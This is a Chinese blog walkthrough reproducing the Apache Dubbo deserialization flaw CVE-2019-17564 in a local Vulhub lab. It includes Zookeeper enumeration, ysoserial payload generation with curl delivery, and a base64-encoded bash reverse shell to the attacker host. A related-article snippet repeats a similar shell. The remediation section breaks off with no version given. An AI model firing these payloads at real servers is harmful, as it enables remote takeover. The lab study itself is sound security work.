《Vulhub-Aapche Dubbo Java反序列化漏洞(CVE-2019-17564)》

最新推荐文章于 2024-04-24 10:01:27 发布
最新推荐文章于 2024-04-24 10:01:27 发布
阅读量830 收藏 3
点赞数 1
文章标签: dubbo java 开发语言 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47118413/article/details/128476550
版权

作者: susususuao
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。

文章目录

一、前言

  近期接工信部网安局通知:近日工业和信息化部网络安全威胁和漏洞信息共享平台检测发现,开源分布式服务框架Apache Dubbo Hession反序列化漏CVE-2022-39198存在反序列化超危漏洞(CVE-2022-39198)。
详情如下:
  Apache Dubbo是一款高性能、轻量级的开源服务框架,其在解析Native_Java协议时,未对用户输入的反序列化数据包进行过滤,导致反序列化过程可被恶意控制,造成恶意代码执行等后果。该漏洞危害级别为超危,影响2.6.10-2.6.12、2.7.9-2.7.18、3.0.0-3.0.12、3.1.0-3.1.1等多个版本。

  在之前我想起在Vulhub漏洞平台复现过Aapche Dubbo Java反序列化漏洞(CVE-2019-17564),虽然不是最新的(CVE-2022-39198)漏洞,但也想把(CVE-2019-17564)分享一下。

二、Apache Dubbo是什么?

Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞。

三、复现步骤

所使用的的是本地vulhub漏洞平台,具体部署可参考vulhub官网
本次复现文章https://vulhub.org/#/environments/dubbo/CVE-2019-17564/

测试环境:

 虚拟机   :VMware Workstation Pro 16
 网络模式 :VMnet8(能够相互通信即可)
 Centos(vulhub)  :IP地址:192.168.5.132
 KALI            :IP地址:192.168.5.128
 Apache Dubbo 2.7.3

1.开启靶场

Centos(vulhub)系统命令如下:

#cd /vulhub-master/dubbo/CVE-2019-17564   //进入靶场环境存放路径。
#docker-compose up -d   //开启环境,第一次可能需要时间拉取环境。

在这里插入图片描述

2.复现

KALI系统命令如下:

#nmap -p- 192.168.5.132     //查看开放端口

在这里插入图片描述对外开放了8080端口和2181端口,其中2181即为Zookeeper的端口,我们本地下载Zookeeper,使用其中自带的zkCli即可连接到这台,Zookeeper下载地址https://github.com/apache/zookeeper

#cd apache-zookeeper-3.8.0-bin/bin/
#ll   //查看里面内容。
#./zkCli.sh -server 192.168.5.132:2181  //使用zkCli连接到这台Zookeeper服务器:

在这里插入图片描述
连接后进入一个交互式控制台,使用ls即可列出其中所有节点,包括Dubbo相关的配置:
获取到RPC接口名为org.vulhub.api.CalcService

[zk: 192.168.5.132:2181(CONNECTED) 0] ls /
[dubbo, zookeeper]
[zk: 192.168.5.132:2181(CONNECTED) 1] ls /dubbo
[org.vulhub.api.CalcService]

在这里插入图片描述
接用ysoserial生成CommonsCollections6的Payload作为POST Body发送到http://your-ip:8080/org.vulhub.api.CalcService即可触发反序列化漏洞:
ysoserial下载地址:
链接:https://pan.baidu.com/s/1X9bdCEhWHIwSpmdhVz5mRA?pwd=2e3e
提取码:2e3e

#java -jar ysoserial.jar CommonsCollections6 "touch /tmp/success" > 1.poc  //生成一个创建success的1.poc
#curl -XPOST --data-binary @1.poc http://192.168.5.132:8080/org.vulhub.api.CalcService   //将Payload作为POST Body发送到靶机

在这里插入图片描述

去靶机验证一下
Centos(vulhub)系统命令如下:

#docker ps   //查看容器
#docker exec -it a723a4e6fee  bash  //进入容器。

#ls /tmp    //在容器里查看脚本执行的创建文件夹

在这里插入图片描述

制做反弹shell的脚本
KALI系统命令如下:

#java -jar ysoserial.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUuMTI4Lzc3NzcgMD4mMQo=}|{base64,-d}|{bash,-i}" > 2.poc  //生成反弹shell的脚本2.poc
#nc -lvvp 7777   //在开一个窗口监听7777端口
#curl -XPOST --data-binary @2.poc http://192.168.5.132:8080/org.vulhub.api.CalcService  //将Payload作为POST Body发送到靶机
#whoami   //查看当前权限

里面的**YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUuMTI4Lzc3NzcgMD4mMQo=**是通过base64加密而来,可通过在线加密得到。

在这里插入图片描述

在这里插入图片描述获取到靶机的root权限

四、修复方案

升级到版本

susu苏打水
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
Aapche Dubbo 反序列化漏洞复现(CVE-2019-17564)
0xSec
12-24 765
Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。
rmi 反序列化漏洞_CVE201917564 Apache Dubbo 反序列化漏洞安全通告
weixin_36277690的博客
01-07 254
【背景】2020年2月10号,Apache Dubbo反序列化漏洞(CVE-2019-17564)被公布,使用 Dubbo-Rpc-Http (2.7.3 or lower) 和Spring-Web (5.1.9.RELEASE or lower)的版本可被利用。Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容...
Aapche Dubbo Java反序列化漏洞CVE-2019-17564漏洞复现
weixin_48413667的博客
09-14 1321
一、软件介绍 Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。 二、漏洞描述 Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞。 三、影响范围 Apache Dubbo ...
探秘Java EE VulnWeb:实战安全漏洞的学习神器
最新发布
gitblog_00039的博客
04-24 399
探秘Java EE VulnWeb:实战安全漏洞的学习神器 项目地址:https://gitcode.com/mtxiaowangzi/Java-EE-VulnWeb 项目简介 Java EE VulnWeb 是一个基于Java EE开发的在线实验平台,旨在帮助开发者、安全研究人员和学生更好地理解和学习常见的Web应用安全漏洞。通过模拟真实的漏洞环境,它提供了丰富的练习场景,让学习者能够亲手实践并...
Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本)
精品博客,你值得一看~
08-25 1044
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。
Aapche Dubbo Java反序列化漏洞复现
Shanfenglan's blog
12-13 1643
文章目录1. CVE-2019-17564原理利用 1. CVE-2019-17564 原理 Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞。 影响版本:Apac
Aapche+Tomcat实现服务数据集群
08-11
Aapche+Tomcat实现服务数据集群 Aapche+Tomcat实现服务数据集群是指通过Apache和Tomcat服务器来实现服务数据集群的方法。这种方法可以解决Tomcat在线访问量超过20-30人的问题,使得服务器可以承载更多的访问请求。 ...
Aapche Tomcat集群与负载均衡
12-06
Tomcat则作为后端的应用服务器,运行Java Servlets和JSP应用。 集群部署有两种基本方式:一是同台机器部署多个Tomcat实例,二是多台机器部署多个Tomcat。在同台机器部署时,只需在同一个系统中安装和配置多个Tomcat...
PHP、Aapche、MySQL配置教程
05-20
在本文中,我们将深入探讨如何配置PHP、Apache和MySQL,这三个组件是构建基于Web的动态应用程序的常用技术栈。... 首先,我们需要分别下载这三款软件的安装文件。MySQL可以从官方网站下载适用于Windows的msi安装包,...
aapche2.2.4 tomcat6 mod_proxy 集群和负载平衡
07-28
NULL 博文链接:https://changhaifeng.iteye.com/blog/800621
apache stratos 4.1.0的samples
11-24
总之,Apache Stratos 4.1.0的samples提供了丰富的实践资源,涵盖了多租户管理、云基础设施集成、容器化应用、服务治理和自动化运维等多个方面。通过学习和实践这些样本,开发者和IT专业人员能够更好地掌握如何利用...
CVE-2019-17564 Apache-Dubbo反序列化漏洞.md
04-12
CVE-2019-17564,Apache-Dubbo反序列化漏洞
[CVE-2019-17564] Apache Dubbo deserialization vulnerability
公众号shadow sock7
02-12 1332
参考 https://mp.weixin.qq.com/s/pHnhHMNArAiZPVGR1btZIg https://www.mail-archive.com/dev@dubbo.apache.org/msg06225.html
CVE-2019-17564漏洞复现[基于Ubuntu 16.04 LTS]
rep_Su的博客
02-15 4909
基于Ubuntu 16.04 LTS的CVE-2019-17563漏洞复现0x0 漏洞描述0x1 影响范围0x2 漏洞复现环境准备环境搭建漏洞展示0x3 其他修复建议关于此文参考链接 0x0 漏洞描述 Apache Dubbo支持多种协议,官方推荐使用 Dubbo 协议,CVE-2019-17564是属于Apache Dubbo HTTP协议中的一个反序列化漏洞,该漏洞的主要原因在于当Apache...
dubbo CVE-2019-17564 CVE-2020-1948 漏洞复现
寒星的博客
06-02 2323
简介 Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。 CVE-2019-17564 漏洞简介 Apache Dubbo支持多种协议,官方默认为 Dubbo 协议,但是当用户选择http协议进行通信时,Apache Dubbo 在接受来自消费者的远程调用的POST请求的时候会执行一个反序列化的操作,由于没有任何安全校验,于是可以造成反序列化执行任意代码。 影响版本 2.7.0 <= Ap.
vulhub漏洞复现——Shiro(CVE-2016-4437) 反序列化
m0_62805300的博客
06-15 324
利用工具https://github.com/feihong-cs/ShiroExploit-Deprecated/releases/tag/v2.51 填入url选择利用方式再攻击上上开启监听 反弹shell
安全反序列化_Apache Dubbo反序列化漏洞安全风险通告(CVE201917564)
weixin_39802132的博客
12-11 595
漏洞综述关于Apache DubboApache Dubbo 是一款高性能、轻量级的开源Java RPC框架,该框架在国内应用较为广泛,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。漏洞描述Apache Dubbo支持多种协议,官方推荐使用 Dubbo 协议,Apache Dubbo HTTP协议中存在反序列化漏洞(CVE-2019-17564...
java 框架漏洞网站_在分层架构下寻找java web漏洞
weixin_36484465的博客
02-28 217
web开发应用程序(网站),是目前应用最广泛的程序。但是开发者的水平参差不齐,导致了各种各样web漏洞的出现。本文站在分层架构的角度,分析一下如何在java web程序中找到可能出现的种种漏洞。本文讨论的只是web程序上的漏洞,和其它漏洞,是相对独立的。这句话看似废话,实际上却说明了时常被忽略的因素,即:“很多人认为只要我开发web程序没有漏洞,web服务器就安全了”,事实上,并非如此。一个合格的...
分享--java漏洞平台的一键安装
2301_76567007的博客
07-26 192
windows命令行输入 java -jar+javasec-1.10 (要求java1.8的环境 需要在文件包的路径上)链接:https://pan.baidu.com/s/1oi-9hX03sMLu8R--SJkz7Q。--来自百度网盘超级会员V2的分享。访问本地9996端口即可成功进入。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

susu苏打水

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值